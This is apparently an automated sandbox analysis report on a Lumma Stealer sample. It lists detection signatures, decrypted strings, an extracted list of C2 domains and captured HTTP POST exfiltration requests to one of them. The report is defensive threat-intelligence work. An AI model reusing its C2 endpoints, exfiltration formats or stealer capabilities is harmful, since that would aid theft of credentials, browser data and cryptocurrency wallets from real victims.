

Windows Analysis Report
rdFy6abQ61.exe

Overview

General Information

Sample name: rdFy6abQ61.exe (renamed because original name is a hash value)
Original sample name: 7a3e26158d0bf299838749875feb6232.exe
Analysis ID: 1584182
MD5: 7a3e26158d0bf299838749875feb6232
SHA1: 7ceb291dc9521d49d1e215af7b60b4de187d08d2
SHA256: ad94f681001f2a56ca7bf4396b78e119ba71acca6f14ef6eed2ef54502246985
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • rdFy6abQ61.exe (PID: 3916 cmdline: "C:\Users\user\Desktop\rdFy6abQ61.exe" MD5: 7A3E26158D0BF299838749875FEB6232)
    • WerFault.exe (PID: 3228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1856 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["noisycuttej.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop", "nearycrepso.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: rdFy6abQ61.exe PID: 3916 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: rdFy6abQ61.exe PID: 3916 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: rdFy6abQ61.exe PID: 3916 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-04T15:31:55.839962+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:56.810219+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:58.142436+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:59.355446+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.96.1 | 443 | TCP
2025-01-04T15:32:01.043748+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:56.313636+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:57.341526+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:56.313636+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:57.341526+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:55.839962+0100 | 2058607 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:56.810219+0100 | 2058607 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49732 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:58.142436+0100 | 2058607 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:59.355446+0100 | 2058607 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49734 | 104.21.96.1 | 443 | TCP
2025-01-04T15:32:01.043748+0100 | 2058607 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49735 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:55.180569+0100 | 2058606 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 55498 | 1.1.1.1 | 53 | UDP
2025-01-04T15:31:58.815163+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP



            AV Detection

Source: rdFy6abQ61.exe | Avira: detected
Source: https://cloudewahsj.shop/api | Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/apiP | Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/apil | Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/apie | Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/ | Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/C | Avira URL Cloud: Label: malware
Source: 0.2.rdFy6abQ61.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop", "nearycrepso.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop"], "Build id": "4h5VfH--"}
Source: rdFy6abQ61.exe | ReversingLabs: Detection: 39%
Source: rdFy6abQ61.exe | Virustotal: Detection: 48%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: rdFy6abQ61.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: cloudewahsj.shop
Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: 4h5VfH--
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 0_2_00415D89 CryptUnprotectData | 0_2_00415D89

            Compliance

Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Unpacked PE file: 0.2.rdFy6abQ61.exe.400000.0.unpack
Source: rdFy6abQ61.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Directory queried: number of queries: 1001
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+01h] | 0_2_00441816
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov eax, esi | 0_2_0043D0D0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh] | 0_2_0043D0D0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+34h] | 0_2_0040C080
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_00422370
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov word ptr [edx], cx | 0_2_00418BA2
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h] | 0_2_00417054
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h] | 0_2_0041B021
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [ebx], al | 0_2_0041B021
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h] | 0_2_004438E0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h] | 0_2_004438F9
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h] | 0_2_004438FB
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h] | 0_2_00422880
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ebx, bx | 0_2_00427885
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx] | 0_2_0041F170
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov dword ptr [ebp-2Ch], eax | 0_2_004421E9
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [edi+10h], 00000000h | 0_2_004421E9
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ebx, byte ptr [esi] | 0_2_0041618C
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h | 0_2_0041BA52
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov esi, ecx | 0_2_0041BA52
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_0041BA52
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh | 0_2_00402210
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_0043A230
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 0_2_004442E0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_00431AF5
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh] | 0_2_0040B280
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h | 0_2_00440A90
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+01h] | 0_2_00441B50
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [edi], bl | 0_2_00409360
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0042FB7D
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx eax, byte ptr [ecx+edi] | 0_2_00408320
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 0_2_00419B30
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 0_2_0041F3E0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_0041B3F2
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ecx, eax | 0_2_0041AB90
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then jmp ecx | 0_2_00428C62
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ecx, eax | 0_2_00427C10
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh | 0_2_00444C20
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h] | 0_2_00414C30
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ecx, eax | 0_2_00418492
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, word ptr [ebx] | 0_2_0043CD40
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 0_2_0042C5E0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_0041B58F
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h | 0_2_004195B6
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov edi, edx | 0_2_0043E6E0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx eax, word ptr [edx] | 0_2_0043E6E0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ecx, edx | 0_2_00430F4E
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ecx, edx | 0_2_00430F54
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov word ptr [ebx], ax | 0_2_0041A770
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ecx, edx | 0_2_00430F03
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0042F716
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 0_2_00407730
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 0_2_00407730
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h] | 0_2_00427FC0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h] | 0_2_00427FC0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h] | 0_2_004437D0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h] | 0_2_0042A7F0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov edx, ecx | 0_2_0042A7F0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ecx, eax | 0_2_00427FFD
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov edx, ecx | 0_2_0042AF92
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_0042AF92
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov edx, ecx | 0_2_0042AFB0
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h] | 0_2_020F5202
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov word ptr [edx], cx | 0_2_020F921E
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_0210B247
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ecx, eax | 0_2_02108264
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h] | 0_2_020FB288
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [ebx], al | 0_2_020FB288
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h] | 0_2_0210829E
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h] | 0_2_020F72BB
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+34h] | 0_2_020EC2E7
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h] | 0_2_02102AE7
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ebx, bx | 0_2_02107B02
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov eax, esi | 0_2_0211D337
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh] | 0_2_0211D337
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx] | 0_2_020FF3D7
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h | 0_2_020F981D
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 0_2_0210C847
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ecx, eax | 0_2_020F886C
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 0_2_020E7997
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 0_2_020E7997
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov word ptr [ebx], ax | 0_2_020FA9D7
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 0_2_020FF647
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_020FB659
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ecx, eax | 0_2_02107E77
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h] | 0_2_02108677
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh | 0_2_02124E87
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then jmp ecx | 0_2_02108EB2
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov edx, ecx | 0_2_0210AF50
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then cmp al, 20h | 0_2_020E275E
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_020FB7F6
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh | 0_2_020E2477
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h] | 0_2_0210AC89
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h | 0_2_020FBCB9
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov esi, ecx | 0_2_020FBCB9
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_020FBCB9
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h | 0_2_02120CF7
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh] | 0_2_020EB4E7
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov edi, dword ptr [esp+18h] | 0_2_020F5527
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 0_2_02124547
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then movzx eax, byte ptr [ecx+edi] | 0_2_020E8587
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_021025D7
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov byte ptr [edi], bl | 0_2_020E95C7
Source: C:\Users\user\Desktop\rdFy6abQ61.exe | Code function: 4x nop then mov ecx, eax | 0_2_020FADF7

            Networking

Source: Network traffic | Suricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.4:55498 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.4:49735 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.4:49734 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.4:49732 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Malware configuration extractor | URLs: noisycuttej.shop
Source: Malware configuration extractor | URLs: rabidcowse.shop
Source: Malware configuration extractor | URLs: wholersorie.shop
Source: Malware configuration extractor | URLs: cloudewahsj.shop
Source: Malware configuration extractor | URLs: nearycrepso.shop
Source: Malware configuration extractor | URLs: framekgirus.shop
Source: Malware configuration extractor | URLs: tirepublicerj.shop
Source: Malware configuration extractor | URLs: abruptyopsn.shop
Source: Joe Sandbox View | IP Address: 104.21.96.1
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.96.1:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: cloudewahsj.shop
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 74
    Host: cloudewahsj.shop
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=H7RLDH9T1ERKF0YD9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18152
    Host: cloudewahsj.shop
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=MTFSOTV1TW6P64QDEZ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8779
    Host: cloudewahsj.shop
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=MQVHS5L6YALPSOF
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20414
    Host: cloudewahsj.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: cloudewahsj.shop
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: cloudewahsj.shop
